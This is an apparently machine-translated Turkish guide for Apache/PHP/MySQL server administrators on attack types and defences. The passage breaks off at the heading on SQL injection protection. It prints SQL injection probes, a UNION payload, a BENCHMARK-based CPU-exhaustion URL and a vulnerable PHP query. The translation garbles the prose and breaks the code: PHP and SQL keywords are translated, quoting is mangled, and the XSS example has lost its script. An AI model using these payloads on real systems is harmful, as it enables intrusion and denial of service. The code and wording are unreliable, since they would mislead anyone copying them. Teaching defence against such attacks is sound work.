Bu yazıda sunuculara yapılan bazı saldırı türlerini ve sunucuyu bilgisayar korsanlarından korumanın yollarını toplamak istiyorum. Güvenlik konusunda birçok kitap ve makale yazılmıştır. Bu makalenin vurgusu, yöneticilerin temel hataları ve bunları ortadan kaldıracak çözümler üzerindedir. Bu makaleyi okuduktan ve kendi sunucusunu kontrol ettikten sonra, yönetici de huzur içinde uyuyamayacak, sadece "aday minimumunu" geçtim diyebilir.

Yöneticilerin üç atasözünü hatırlayın,
Numara! bunları yazdırın ve iş yerinize gözünüzün önüne asın:
"Güvenlik bir süreçtir",
"Yöneticinin yapacak bir şeyi olmadığında güvenlikle meşgul olur",
"Güvenlik en zayıf halka tarafından tanımlanır"
Makale *nix + Apache + PHP + Perl + (MySQL | PostgreSQL) yöneticilerine ve sunucuları uzaktan saldırılara karşı korumaya yöneliktir, diğer yöneticiler için makalenin düşünceye gıda olacağını umuyorum.
Farklı kitapların farklı hacker saldırıları sınıflandırmaları vardır, kendi bölünmemi iki koşullu TÜM saldırı sınıfına tanıtacağım, gruplarını çözeceğim:

  • Güvenlik açığı bulunan ve İnternet üzerinden erişilebilen hizmetlere saldırı

Bölümümü anlamak için, 80 numaralı bağlantı noktasında Apache'ye uzaktan saldıran kurgusal bir komut dosyası olduğunu ve saldırı sonucunda Apache'nin kapandığını ve web sayfalarını dağıtacak kimse olmadığı için siteniz olmadan kaldığını hayal edin. Sendmail posta sunucunuz VRFY'ye parametre olarak kısa bir kullanıcı adı yerine 1000 karakter gönderildi, sendmail bunun olmasını beklemiyordu ve size posta bırakmadan kapandı. Bu koşullu sınıfın saldırılarının genel anlamı, bazı uygulama güvenlik açıklarından yararlanılmasıdır. Ve üç yol var -

  • path1) uygulama çökecek ve hizmet kullanılamayacak, DoS durumu;
  • yol 2) uygulama kaynakları yakalamaya başlayacak ve bunları tükettikten sonra bir DoS yapacak;
  • path3) uygulamaya bir kabuk kodu verilir ve saldırganın kodu çalıştırılır;

Bunların tümü hizmete (öğe 1) yönelik saldırılardır ve yalnızca tek bir şekilde ele alınır: yönetici, geliştiriciden bir güvenlik açığının varlığını hemen öğrenir ve bu programı günceller.

2. noktadaki saldırı, bazı programlama dillerinde uygulanan dinamik bir hizmetin parametrelerin alınmasına izin vermesi ve bunları kontrol etmeden yürütmesidir. Örneğin, bir tarayıcı kullanarak, bir saldırgan, bir Apache sitesinde gezinerek, sitenin kendisindeki güvenlik açıklarını arar ve bunlardan yararlanarak istediğini elde eder. Tcl'de yazılmış, IRC sunucu kanalını denetlemek için bot, kullanıcıdan (yeni bir şakanın sayısı, hava durumunu görüntülemek için günün tarihi) ve bilgisayar korsanından istekleri alır, bot program kodunun çalışmasını yeniden oluşturur (tersine mühendislik). ), bot yazarı tarafından dikkate alınmayan istekleri oluşturur.

Nasıl olduğunu sor o zaman kesinlikle bu makaleye ihtiyacınız var. Öyle ya da böyle, hemen altında her şey boyanacak.

Güvenlik açığı bulunan hizmetlere ve sunucunun kendisine saldırı

Bu bölümde sistem ve servislere etkisi olan tüm saldırılara yer verdim. Genellikle bu tür saldırılar, programın uygulanmasındaki arabellek taşmaları (arabellek taşması) gibi hatalardan kaynaklanabilir. Kısacası, şöyle görünüyor, diyelim ki kötü yazılmış bir ftp sunucusunda, belirli sayıda karakter için bir kullanıcı adı için bir dizi (arabellek) var (örneğin, 10) ve böyle bir ftp sunucusu, bir hastadan 100 karakter alıyor. -Wisher, ftp sunucu kodunda böyle bir durum kontrol edilmezse arabellek taşması meydana gelir.

Peki bilgisayar korsanları için yararlı olan yerel bir arabellek taşması nedir? Kötü amaçlı kod ile iade adresinin üzerine yazmak mümkündür. Uzaktan, bu, hedef sistemde yerel olarak rastgele kod çalıştırmanıza izin verir, program kök olarak çalışıyorsa, bu sistem yöneticisi ayrıcalıkları kazanmanıza izin verir.Bir arabellek taşmasına neden olan ve bir bilgisayar korsanı için eylemler gerçekleştiren koda kabuk denir. Kabuk kodu yazmak kolay bir iş değildir ve bilgisayar korsanının montaj dili bilgisi gerektirir, bu da bu alanda profesyonellik anlamına gelir.

Güvenlik açığı bulunan hizmetlere ve sunucunun kendisine yönelik saldırılara karşı koruma

  • Güncelleme. Tüm sistemin nasıl güncelleneceğini öğrenmek ve bu nedenle
    *nix için "dünyayı ve çekirdeği oluşturun", Linux paket sistemi aracılığıyla güncelleyin ve lisanslı MS Windows için Windows Update'teki Güncelle düğmesini tıklayın. FreeBSD yöneticilerinin bağlantı noktalarını kullanarak yazılım yükleyebilmesi gerekir. Bu şekilde geliştiricilere karşı değil, onlarla birlikte yelken açacaksınız.

    MS Windows yöneticilerinin, Microsoft tarafından şiddetle tavsiye edilen ve eski paketi yenisiyle güncellemeyi destekleyen MSI dağıtım formatına daha sık alışması ve kullanması gerekiyor. Sunucunuzda ne yaparsanız yapın, bu programın yeni bir sürümü var mı diye kendinize sorun, güncellemek ne kadar kolay? Tam kontrolünüz altında bir çözüm oluşturmalısınız, evet, kendi geliştirmeleri veya yamaları olan projeler var ama geliştirmeleriniz, ihtiyacınız olan uygulamaları belirli bir sürümde dondurmayı gerektiriyorsa ve yamalarınızı yeni sisteme uygulayamıyorsanız - böyle bir çözüm DEĞİLDİR!

    Burada lirik bir arasöz yapacağım ve size kendimi nasıl kırmam gerektiğini anlatacağım. İnternette genellikle böyle başlayan yazıları okuduktan sonra "kaynağı indir ve kur yap". Peki, sırada ne var? Yeni sürümü nasıl kuracaksınız? (de|un)kurulum yapabilmek için eski sürüm kalsın mı? Ve yeni make install'da tekrar mı? Bu sorular arkadaşım Dmitry Dubrovin tarafından FreeBSD öğrenmeye başladığımızda soruldu. Haklı olduğunu ve en azından Free için bu yolun uygun olmadığını anlamaya başladım ve FreeBSD geliştiricilerinin yolunu takip etmeyerek sadece işleri kendim için daha da zorlaştırdım.

    Şimdi, FreeBSD'ye hakim olduktan sonra, birkaç komut Free kernel ve tüm sistem için yeni kaynaklar indirdiğinde, ardından birkaç komut yeni bir dünya ve çekirdek oluşturduğunda ve ardından sistemdeki bağlantı noktalarını ve uygulamaları güncellediğinde, anlamaya başlarsınız. * nix sistemlerinin gücü. FreeBSD'li bir sunucuyu eski bir daldan şimdiki şubeye yükselttiğinizde, sistemin dünyasını yeniden inşa ettiğinizde, sistem kendini yeni kaynaklardan derlerken (Munchausen saçından çekmiş gibi görünüyor) ve her şeyde hissettiğiniz gururu aktarmanız zor. yükseltmeden önce çalışan "dosyasız" da çalışır.

    Zaten anladığınız gibi, işinizi destekleyen ve periyodik olarak güncellenen yazılımların geliştiricilerinden gelen güvenlik posta listelerine abone olmalısınız. Her şeyin ve her şeyin yenilenmesi mükemmelleştirilmeli ve raylara oturtulmalıdır.

  • Güvenlik ayarı. Çoğu sunucu işletim sistemi, İnternet'in zorlu "kimyasal" ortamında çalışmak için varsayılan olarak yeterince yapılandırılmış olarak gelmez. Bilgisayar korsanlarının sunucunuzda "hile yapmamaları" için güvenlik ayarlaması yapmanız, yani işletim sistemi üreticisinin güvenlik konusundaki önerilerini okumanız gerekir. *nix sistemlerinin yöneticileri adam güvenliği çağırabilir ve geliştiricilerin tavsiyelerini okuduktan sonra peri masalını gerçeğe dönüştürebilir. Ancak işletim sistemi ne olursa olsun, güvenlik ayarından sonra sunucunun ve hizmetlerin çalışmasını dikkatlice test etmeniz gerekir.
  • güvenlik duvarı. Kişisel olarak nmap port tarayıcıları ve güvenlik açığı tarayıcıları kullanarak kontrol ettiğiniz yapılandırılmış bir güvenlik duvarı, bu programlardan bir çıktı varsa, neyin tehlikede olduğunu anlıyor musunuz? Bir güvenlik duvarı kurarken, kurallarını atlamanın yolları olduğunu unutmayın. Örneğin, bir güvenlik duvarı tarafından korunan bir yerel alan ağı vardır, paket parçalanma yasağı bayrağını ayarlayarak, belirli durumlarda yerel alan ağındaki hedefe ulaşmak mümkündür. Veya yöneticinin yaygın bir hatası, kendi sunucusunun giden paketlerine aşırı güvenmesi.

    Gerçek bir durum hayal edin, düşman kodu, bilgisayar korsanının sahibiyle bağlantı kurmaya çalışıyor ve güvenlik duvarında "İnternete benden her şeye izin var" kuralınız var. Güvenlik duvarı kuralları oluştururken, hizmetlerinizin kendileri ve uzak istemciler arasındaki ağ iletişiminin tüm resmini tam olarak anlamanız gerekir.

  • Saldırı tespit sistemi. Güvenlik duvarı, bir şövalye kalesinin yakınındaki taş duvarlar olarak düşünülebilir. Bir kez dikildi ve içeride oturun - kuru ve rahat. Ama ya biri zaten duvarların gücünü toptan test ediyorsa? Belki de zaten kaleden dışarı bakmanız ve birinin üzerine yığmanız gerekiyor? Kalenin duvarlarının arkasında, dışarıdakilerin neler olduğunu bilmek için sunucuda bir saldırı tespit sistemine (IDS) sahip olmanız gerekir. Beğendiğiniz pakete dayalı böyle bir sisteminiz varsa, o zaman biri nmap silahından ateş etmeye başlarsa, siz haberdar olacaksınız ve saldırgan da "ne bildiğinizden" haberdar olacaktır.
  • Standart olmayan durumların analizi. Sistemdeki çok sayıda günlükte, "hata: /etc/passwd dosyasını açmıyor" veya "erişim reddedildi" yazıtları sıklıkla yanıp söner. Bunlar, bir şeyi, bir yeri okuyamayan ya da belki bir zil değil, ama yolun yarısında olan bir bilgisayar korsanı hakkında alarm veren bir alarm, yanlış yapılandırılmış bir uygulama hakkında çalan küçük çanlardır.

    Her durumda, yönetici bu tür şeylerden haberdar olmalıdır. Yöneticinin işini kolaylaştırmak için, ilginç ifadelerin ortaya çıkması için günlükleri analiz edecek ve yöneticiye posta yoluyla bir rapor gönderecek programlar oluşturulmuştur. Böyle bir fırsatı küçümsemeyin, bu tür programlar güvenilir bir yolu kontrol eden gardiyanlarla karşılaştırılabilir, ancak herkes öngörülen şekilde mi davranıyor?

  • Yazılım sürümlerini kaldırın. Hizmetlerinizden afişleri kaldırın. Hayır, sitenizde gösterdiğiniz banner'lar değil, programlarınızın bağlanırken selamlamada veya hata çıktılarında verdiği satırlar. Programlarınızın sürümleriyle parlamaya gerek yoktur, bilgisayar korsanları, sürümlere göre şu veya bu güvenlik açığından (sömürü - yararlanma) yararlanan mevcut programlar için İnternet'te arama yapar.

    Burada tek bir çözüm yoktur, örneğin, bağlantı noktalarından belirli bir program kurarsanız, o zaman make install clean yazmayın, bu yüzden siz olmadan her şey indirilecek, derlenecek ve kurulacaktır. Getirmek daha iyi; özü yapmak; daha sonra dosyalar alt dizinine gidin ve orada programın sürümünü kaynaklarda düzeltebilir veya başka bir sürüm olarak aktarabilir ve ardından yalnızca kurulumu temiz yapabilirsiniz.

    Apache çok bilgilendiricidir ve hala sistem sürümleri, PHP, Perl, OpenSSL ile parlıyor. Httpd.conf ServerSignature Off ServerTokens Prod'da yönergeler belirtilerek rezalet devre dışı bırakılır. İnternette, afişleri herhangi bir programla değiştirme konusunda yardım bulabilirsiniz. Amaç aynı - saldırganı değerli bilgilerden mahrum etmek. İnternette bulunan hizmetler listenize bakarak, kendinize ve sakladığı bilgiler hakkında çok fazla bilgi verip vermediğini sorun.

    Örneğin, DNS sunucusu bağlantısı "bölge aktarımına" izin verebilir ve bilgisayarlarınız IP ve alan adlarıyla herkesin kullanımına açık olur ki bu kötü bir şeydir. Sunucunuzu çeşitli tarayıcılarla kontrol edin ve sonuçlarını dikkatlice okuyun. Program başlığını değiştirirken rastgele metin değil, sorumluluk ve eylemlerin günlüğe kaydedildiği konusunda bir uyarı eklemenizi öneririm. Mahkeme salonunda bir bilgisayar korsanının serbest bırakıldığı olaylar olduğundan, saldırıya uğrayan FTP sunucusunda "Hoş Geldiniz! Hoş Geldiniz!" Yazısı vardı.

  • Minimum gereksinim kuralı. İnternet için mevcut hizmetleri en aza indirin. Devre dışı bırakılanları hackleyemeyeceğiniz için ihtiyacınız olmayanları devre dışı bırakın. Örneğin, aynı makinede Apache ile eşleştirilmiş bir MySQL sunucusunun varsayılan 3306 numaralı bağlantı noktasında uzaktan erişilebilir olacak şekilde yapılandırılması yaygın bir hatadır. Neden? komutu verin netstat -na | grep LISTEN ve kendinize cevabı verin: hangi programların hangi arayüzü ve hangi portu kullandığını biliyor musunuz? kontrol sende mi? Peki öyleyse.
  • Birçok güçlü ve farklı şifre. Genellikle bilgisayar korsanlığıyla ilgili videolarda veya bilgisayar korsanlarının bilgisayar korsanlığıyla ilgili hikayelerinde "yöneticinin yönetici paneli için ssh ve ftp'ye de giden bir parolası olması iyi bir şey" ifadesi yanıp söner. Umarım bu seninle ilgili değildir. Bu nedenle kural: farklı hizmetler için parolalar farklı ve en az 16 karakter uzunluğunda olmalıdır. Unutmaktan korkuyorsanız (burada güvenlik uzmanları beni öldürüyor), ancak bu, şifrenizin şifresinin uzak bir saldırgan tarafından birkaç dakika içinde çözülmesinden daha iyidir, çünkü şifrenizin uzunluğu kısadır. şifre ve sözlük kelimesine benzerliği bunu mümkün kıldı.

    Hizmetler /etc/passwd veritabanında sistem kullanıcıları olarak değil, kendi düzlemsel veya DBMS veritabanlarında sanal olarak yetkilendirecekse, farklı hizmetler için farklı şifreler yapmak kolaydır. Yönetici olarak erişiminiz olan tüm kaynaklar için parolaları password.txt dosyasındaki sunucularda saklamayın.

  • sınırlama. Sunucudaki tüm hizmetleriniz farklı sınırlı hesaplardan (hesap) çalışmalı ve asla kök hesaptan çalıştırılmamalıdır. İnanın bana, eğer sınırlı bir hesaptan root statüsüne (uid=0, gid=0) ayrıcalık yükseltmeye ulaşırlarsa, güncellenmiş sisteminizde bilinen açıkların olmaması sizi kurtaracaktır.

    Bu arada, birçok yönetici böyle bir şeyi unutuyor, örneğin Apache ve MySQL çalıştıran hesapların neden kabuğa erişimi olması gerekiyor! Sonuçta, bu devre dışı bırakılabilir ve kabuk yerine / bin / false belirtin. Dürüst olmak gerekirse, raporlama sunucunuzdaki programlar için hesaplarınızı kontrol edin ve yanılıyorsam bana söyleyin. SQL veritabanlarınızda, hesapları gereken minimum ayrıcalıklarla sınırlayın. Yalnızca SELECT çağrıldığında DOSYA ayrıcalıkları vermeyin.

  • Herkes hapse! Korumalı alanlar (korumalı alan) veya hapishaneler (hapishane) ile nasıl çalışacağınızı ve uygulamaları bu izole odalarda çalıştırmayı öğrenin, bu tüm sunucuyu hacklemeyi zorlaştıracaktır. Sanallaştırma kullanıyorsanız, hizmetleri farklı konuk işletim sistemlerine yayabilirsiniz.
  • Katmanlı savunma. Bir şeyi farklı yerlerde çeşitli şekillerde yasaklamak mümkündür - yapın. ASLA düşünme - Ben burada yasakladım, orada gereksizleri yasakladım.

Güvenlik açığı bulunan hizmetlere ve sunucunun kendisine yönelik saldırılar hakkında daha fazla bilgi edinin.

  • DoS saldırısı (Hizmet Reddi) - amacı herhangi bir sınırlı sunucu kaynağını (İnternet kanalı, RAM, işlemci vb.) tıkayarak sunucunun meşru kullanıcılara hizmet vermesini engellemek olan bir saldırıdır. Mecazi olarak konuşursak, bir davetsiz misafirin sizi evde aradığını ve telefonda sessiz kaldığını ve bunun bütün akşam sürdüğünü hayal edin. Bütün bunlardan bıktınız ve telefonu kapattınız ve sabah patronunuzdan önemli bir aramayı kaçırdığınızı öğrendiniz. İşte bir DoS saldırısı için gerçek bir hayat benzetmesi.

    Gerçek hayatta DoS genellikle böyle görünür, programdaki bir bug nedeniyle işlemci kullanımı atlar ve uzun bir süre %100'de kalır ve saldırgan programdaki bu delikten periyodik olarak yararlanır. Kötü yazılmış bir uygulamanın RAM'i bitebilir. Veya arşivde, antivirüs tarafından kontrol edilmek üzere paketten çıkarılacak [boşluk] birçok karaktere sahip yoğun bir şekilde sıkıştırılmış bir dosya biçiminde bir "posta bombası" ve paketlenmemiş büyük dosya, sunucudaki sabit disk bölümünden taşar ve / ve sunucunun yeniden başlatılmasına neden olur.

    DoS Saldırı Koruması:

    • DoS saldırısı için manipüle edilen bir programı güncelleme
    • Bu programın çalıştığı hesap için kaynak kotaları ayarlayın. *nix sistemleri, CPU kullanım yüzdesini, RAM'i, oluşturulan işlem sayısını, açık dosyaları vb. ayarlamanıza olanak tanır. vb.
    • Programda oturum açmayı kurun ve saldırgan-kuklacıyı bulmaya çalışın ve onu güvenlik duvarında engelleyin.
    • Kendinizi böyle bir durumda bulursanız, programı geliştiricinin, gurunun, İnternet'teki makalelere göre önerdiği şekilde kurun.
  • DDoS (aynı DoS, ancak liderliğindeki birkaç zombi bilgisayardan saldırıya uğruyorsunuz.
    saldırgan). DDoS yıkıcıdır ve yalnızca zombi makineleri sürüsü olan ve saldırıyı durdurmak veya işinize zarar vermek için para talep edecek olan ve böylece kullanıcılar sunucunuza ulaşmadan bir rakibe yönelen vandallar tarafından kullanılır. DDoS saldırıları, amacı sunucunuzu entelektüel olarak hacklemek olan bilgisayar korsanları tarafından kullanılmaz, evet evet, sunucunuz "çözmek" istedikleri bir "gizem"dir.

    Kendinizi DDoS'tan Nasıl Korursunuz? Kendi gücünüze ve araçlarınıza güveniyorsanız, komut dosyalarının çalışmasını otomatikleştirerek, çeşitli günlüklerden IP adreslerini bulabilir ve bunları yasaklayan güvenlik duvarı kurallarına girebilirsiniz. Mesela Hacker dergisinde "DDoS altında hayat var mı?" makalesinin yazarı mı? Güvenlik duvarında saldırgan ağlarını engelleyin, programlarınızı yapılandırma ile ilgili makaleleri okursanız ve bu talimatları izlerseniz DDoS hasarı azaltılabilir. birçok makale DDoS hasarını en aza indirecek şekilde nasıl yapılandırılacağı hakkında.

    DDoS saldırılarına karşı koruma:

    • DDoS uygulamaya yönlendiriliyorsa, günlüklerde saldırganlar ve meşru kullanıcılar arasındaki farkı bulmaya çalışın ve bir komut dosyası ile otomatikleştirerek, reddetmede güvenlik duvarı kurallarına girin.
    • DDoS sisteme yönlendiriliyorsa (örneğin, ICMP protokolü üzerinden bir saldırı), bir komut dosyası ile otomatik hale getirilerek, reddetmede güvenlik duvarı kurallarına ekleyin.
    • Bu programın çalıştığı hesap için kaynak kotaları ayarlayın. * nix sistemleri, CPU kullanım yüzdesini, RAM'i, oluşturulan işlemlerin sayısını, açık dosyaları vb. yapılandırmanıza izin verir.
    • Kendinizi böyle bir durumda bulursanız, programı internetteki makalelere göre geliştirici, guru tarafından önerilen şekilde kurun.
    • Ellerinden geldiğince yardımcı olması için yukarı akış sağlayıcınızla iletişime geçin. şikayet yaz [e-posta korumalı] host_of_networks_from_attack.domain. Bu, saldırganın ağını kısmen yok etmeye yardımcı olur, zarar görmesine izin verir, bu ona paraya mal olur. Ahlaki tatmini deneyimleyin.
    • Apache için mod_security'ye göz atın, bazı durumlarda size yardımcı olacak harika bir araçtır.
  • Bruteforce şifre saldırısı. Burada programlardaki boşluklar suçlanamaz, sadece kabaca bir çift giriş / şifre seçerler. Sunucudan ssh yapılandırılmış olarak ayrılan, ancak belirli IP'lerden ve belirli oturum açmalardan (ssh_config AllowUser'daki yönerge) ssh yoluyla erişimi kısıtlamayı unutanlar, günlüklerde mash parolasını kaba kuvvete zorlama girişimlerini görmüş olmalıdır: mash_password.

    Bruteforce parola koruması:

    • Başarısız oturum açma/şifre denemelerinin sayısını sınırlayın
    • Uygulama izin veriyorsa, yeni bir oturum açma / şifre denemesinden önceki süreyi artırın.
    • Uygulama ile dar bir insan çevresi çalışması gerekiyorsa, böyle bir kural oluşturun ve onu sınırlayın.

Hizmetin dinamik içeriğine saldırın

Bu tür saldırı genellikle basit bir tarayıcı kullanarak *nix dünyası için bir grup Apache + (PHP | PERL) + (MySQL | PostgreSQL) ve MS Windows dünyası için IIS + ASP + Microsoft SQL Server'da gerçekleşir, ancak bu yalnızca Web'in popülaritesi nedeniyle daha sık kullanılan özel bir durum. Bu pakette, programlama dilleri ASP, PHP, Perl, SQL'dir, bu nedenle bilgisayar korsanları tarafından yıkıcı tasarımlarını derlemek için sıklıkla kullanılacaktır.

AMA anlaşılması gereken en önemli şey, bu tür bağların üstüne servis + dinamik içerik programlama dillerinde çok sayıda var ve bu nedenle hepsi bilgisayar korsanlarının silahı altında. Örneğin, burada tamamlanmamış bir liste var:

  • Web sunucusu + CGI betikleri
  • Artık kullanılmayan eski bir bağlantı - Apache + PHF (yani PH F) komut dosyaları
  • IIS + ColdFusion Uygulama Sunucusu
  • SSI mekanizması (Sunucu Tarafı Dahil)

Ardından, daha çok web hack'lerinden bahsedeceğiz, ancak aşağıda açıklanan her şeyin diğer hizmet + dinamik içerik paketleri için de geçerli olduğunu unutmayın. Sözler farklı ama öz aynı. Bugün bilgisayar korsanları web'e tarayıcı ile, yarın R istemcisi ile Z servisine saldırıyorlar.Kendisi veritabanlarına ve sayısız programlama diline bağlı olan web sunucusu bu tür saldırılar için bir platform haline geldi.

Bu tür tüm saldırıların anlamı, sitenin dinamik içeriğine (içeriğine) hizmet eden komut dosyalarındaki hataları bulmak için bir tarayıcı kullanarak siteyi incelemeye çalışmaktır.

Dolayısıyla sonuç - yalnızca birbirine atıfta bulunan statik html sayfalarının bulunduğu web'e yapılan bir saldırı yoluyla bir siteyi hacklemek İMKANSIZDIR. Web siteniz üzerinden yapılan saldırılar, insanların daha fazla etkileşim istediği zaman ortaya çıkmış ve bunu programlama dilleri ve veritabanları aracılığıyla eklemiştir.

Sitede gezinen bilgisayar korsanları, herhangi bir parametreden geçirilen komut dosyalarına özellikle dikkat eder. Ancak, komut dosyası yazarı, parametre değeri olarak tam olarak neyin iletildiğini kontrol etmezse ne olur?

Hizmetin dinamik içeriğine yapılan saldırılara karşı yönetici için genel çözümler (özel durum olarak web sitesi)

  • Güncelleme. Bunun hakkında zaten konuştuk, ancak üçüncü taraf geliştirmelerini (forum motorları, galeriler, sohbetler vb.) kullanırsanız, güvenlik açıkları ve yama delikleri hakkında raporlar alacaksınız. Bilgisayar korsanlarının görüşü, eğer portal finans ve ciro ile çalışıyorsa, böyle bir portalın kendi gelişmelerinden başka birinin gelişmelerine sahip olması arzu edilmez. Elbette site için kendi motorlarının geliştirilmesinin güvenli programlamayı bilen ve internetteki tehditlere karşı anlayışlı kodlayıcılar tarafından yazıldığı anlaşılmaktadır.
  • Standart dışı olun. Birçok hacker yardımcı programında, güvenlik açığı veritabanları, forum/, galeri/, resimler/yollar sıklıkla yanıp söner. Çok rahat! Yöneticiyi tanıyın, siteniz /usr/www'de olmadığında ve admininiz site.com/admin olmadığında yarısı tıraş olur ve sitenize tükürür. Sonuç olarak, standart değilseniz, o zaman bu, sitenize saldıran bir bilgisayar korsanının tekerleklerinde ek bir konuşmadır. Manuel veritabanına/komut dosyasına eklemesi/düzeltmesi gerekecek. Ancak bir bilgisayar korsanı her zaman bunu yapabilir mi veya yapmaya istekli midir? Genç bilgisayar korsanları "senaryo çocukları" kesinlikle korkacaklar. Örneğin, PHP güvenlik ipuçları

    # PHP kodunun diğer kod türleri gibi görünmesini sağlayın
    AddType uygulaması/x-httpd-php .asp .py .pl
    # PHP kodunun bilinmeyen tür kodları gibi görünmesini sağlayın
    AddType uygulaması/x-httpd-php .bop .foo .133t
    # PHP kodunun html gibi görünmesini sağlayın
    AddType uygulaması/x-httpd-php .html .htm

    PHP için gizlenme yoluyla sağlanan bu güvenlik biçimi, düşük maliyetle birkaç dezavantaja sahiptir. Bilgisayar korsanlarının kendileri, saldırılarını açıklayarak, sunucunuzda bulunan aynı yazılımı geliştiricinin sitesinden indirdiklerini ve hangi varsayılan tablo adlarına / yollarına / bu veya bu motorun çalıştığına baktıklarını yazar. Standart olmayanın genel anlamı, bilgisayar korsanının bir "blitzkrieg" yaşamaması için bilgisayar korsanlığı sürecini geciktirmektir ve ne kadar çok çekerse, tespit edilme olasılığı o kadar artar.

  • Sitedeki motorların ve komut dosyalarının sürümlerini kaldırın. Bu, saldırganın, hack için hazır çözümler aradıkları sürümü bilerek mahrum bırakılması gereken değerli bilgilerdir. Komut dosyalarınızın hatalar hakkında yararlı bilgiler yazdırmadığından emin olun, örneğin: hatanın oluştuğu komut dosyasının yolu ("yol ifşası" sorunu) ve hatanın gerçek çıktısı.
  • .htaccess ihtiyacını göz önünde bulundurun. .htaccess dosyalarının varlığı, ana Apache yapılandırmasında ayarladığınız seçenekleri geçersiz kılabileceğiniz anlamına gelir, inanın bana, bilgisayar korsanları tam da bunu yapacaktır. "AllowOverride None" yönergesi ile .htaccess kullanımını devre dışı bırakırsanız, Apache için bir performans avantajı elde edersiniz, çünkü her istekte web sayfasına giden yoldaki tüm dizinlere bakmayacak ve güvenliği artıracaktır. Apache web sunucusu.

Dinamik içeriğe yönelik saldırılar hakkında daha fazla bilgi (özel bir durum olarak web sitesi)

  • XSS (Siteler Arası Komut Dosyası Oluşturma).
    Siteler arası komut dosyası çalıştırma, CSS değil, XSS olarak adlandırılır, çünkü CSS, "Basamaklı Stil Sayfaları" için erken bir kısaltmadır. XSS saldırıları sunucuya değil, o sunucunun kullanıcılarına yöneliktir. Ancak yöneticinin sevinmesine gerek yok! XSS saldırısı şuna benziyor, sitenin web sayfasında düzenlenebilir alanları veya formun yapımında filtrelenmemiş komut dosyası parametreleri var<, >, javascript.

    Bilgisayar korsanı, düzenlenebilir alanlara genellikle Java ve VBScript olmak üzere istemci tarafı programlama dilinde kod ekler ve bu kod HTML sayfasının bir parçası olur. Bir kullanıcı böyle bir sayfayı ziyaret ettiğinde, tarayıcısı sayfayı ayrıştırır ve bu kodu yürütür.
    Bilgisayar korsanları XSS ​​ile ne yapar?

    • Çerez hırsızlığı (çerezler, çörekler) - bu metin dosyaları, sunucunun daha sonraki tanımlaması için kullanıcıya "koyduğu" bilgileri depolar. Örnekte, bu içerikle bir test.html dosyası oluşturursanız (kendiniz yazın), ardından bir tarayıcıda çalıştırıldığında XSS çıktısı verir.
      Sayın admin, siteyi ziyaret ederken bir hatayla karşılaştım.
      Yardım

      Ancak Java'da bir komut dosyası yazabilirsiniz ve daha ciddi. Tipik olarak, bu tür komut dosyaları yöneticinin web postasına yazılır ve sosyal mühendislik kullanılarak çerezlerini alabilmesi için mesajı okumasını sağlamaya çalışır.

      Çerezlerde IP adresine bağlantı ve ek güvenlik önlemleri yoksa, çerezlerini admin çerezleri ile değiştirir ve giriş ve şifreyi kontrol etmeyen ve sadece çerezlerle kişileri tanımlayan admin paneline girmeye çalışırlar.

    • Site tahribatı (tahrif - sitenin başlangıç ​​sayfasının değiştirilmesi, çoğunlukla index.html)
    • Uzak bir kullanıcının Truva atı. Kullanıcıların tarayıcıları için yeni istismarlar seçilir ve savunmasız bir sayfaya girdiklerinde, bilgisayara bir Truva Atı bulaştırma girişiminde bulunulur. Kullanıcının yeni veritabanlarının kurulu olduğu bir antivirüs varsa, sistemde bir Truva atının görünümünü gösterecektir. Ve siteniz kullanıcının gözüne düşecek, belki bir daha size gelmeyecektir.
    • DoS. Çok sayıda ziyaretçiyle, komut dosyası ayrıca sunucunuzdan veya başka birinden daha fazla sayfa isteyecektir, birinin DoS'si olabilir.

    Çözüm:

    • Girdi alanlarından veritabanına html etiketlerinin yazılmasını engellemek için, PHP için htmlspecialchars gibi yapıları kullanın.< на <, >için >, & için & ve benzeri
      Örnek,

      $yorum = htmlözel karakterler($yorum, ENT_QUOTES);
      $query = "ziyaretçi defterine ekle
      (ad, konum, e-posta, url, yorum) değerleri
      ("$isim", "$konum", "$e-posta", "$url", "$yorum");
      mysql_query($sorgu) veya die(mysql_error());

    • Komut dosyalarınızda, kullanıcının girdiği ve adres çubuğu aracılığıyla komut dosyasına ilettiği tüm parametreleri kontrol edin ve filtreleyin. Gelen verileri ayrıştırmak için normal ifadeleri nasıl doğru şekilde kullanacağınızı öğrenin. Programlama diliniz için size nasıl güvenli bir şekilde kod yazacağınızı öğreten materyal bulun.
    • Sitenizde çerez teknolojisini kullanmak istiyorsanız lütfen Çerez Güvenlik Uygulamalarımızı okuyun. Eylemlerini zamana ve IP adreslerine göre sınırlayın.
    • Bir yönetici olarak, sosyal mühendislik tarafından dolandırıldığınızda dikkatli olun. İstemci bilgisayarınızın arkasındaki kişisel bilgisayar güvenliğini unutmayın.
  • SQL enjeksiyonu. SQL enjeksiyonu.
    Bu hastalık, komut dosyasında görünen SQL sorgusunda denetlenmeyen bir parametrenin değiştirildiği anlamına gelir. Bilgisayar korsanı, SQL enjeksiyonundan muzdarip komut dosyalarını basit bir şekilde bulur, parametre değerine site.com/view.php?id=1" alıntısı verilir veya sayısal parametre bu site.com/view.php? id=2-1.

    Değiştirilen alıntı bir "hataya" neden olursa (böyle bir isteğin böyle bir komut dosyasında böyle bir yol boyunca yürütülmediğine dair bir sürü mesaj), o zaman böyle bir komut dosyası onu daha fazla pompalamak için bir adaydır. Saldırganlar genellikle Google hack'ini kullanır ve arama motoruna "site: www.victim.ru Uyarı" gibi bir şey sorar. .

    Değeri kontrol etmeyen ve SQL enjeksiyonundan muzdarip kod

    $id = $_REQUEST["id"];
    $result = mysql_query("başlık, metin, datenews SEÇ, yazar FROM `news` WHERE `id`="$id"");

    Şimdi bir sayı yerine "-1 union select null/*" (tırnak işaretleri olmadan) ile değiştirileceğini ve ardından sorgunuzun

    SELECT başlık, metin, datenews, yazar FROM `news` WHERE `id`="-1 union select null/*"

    Yani bilgisayar korsanı, sizin isteğinize ek olarak, sendika yönergesini kullanarak sizinkiyle birleştirilmiş isteğinin yürütülmesini istiyor. Sonra hacker başka sorgular yapmaya çalışacak ve SQL dilinin gücü göz önüne alındığında bu yönetici için iyiye işaret değil. Tahriften (tahrif - sitenin başlangıç ​​sayfasının değiştirilmesi) sunucunuz üzerinde kök haklarını almaya kadar. Bir bilgisayar korsanı ayrıca SQL enjeksiyonu sayesinde bir DoS saldırısı gerçekleştirebilir: site.com/getnews.php?id=BENCHMARK(10000000,BENCHMARK(10000000, md5(current_date))) bu tür birkaç istek ve sunucu %100 CPU'da uzun süre yük.

    SQL Enjeksiyon Koruması:

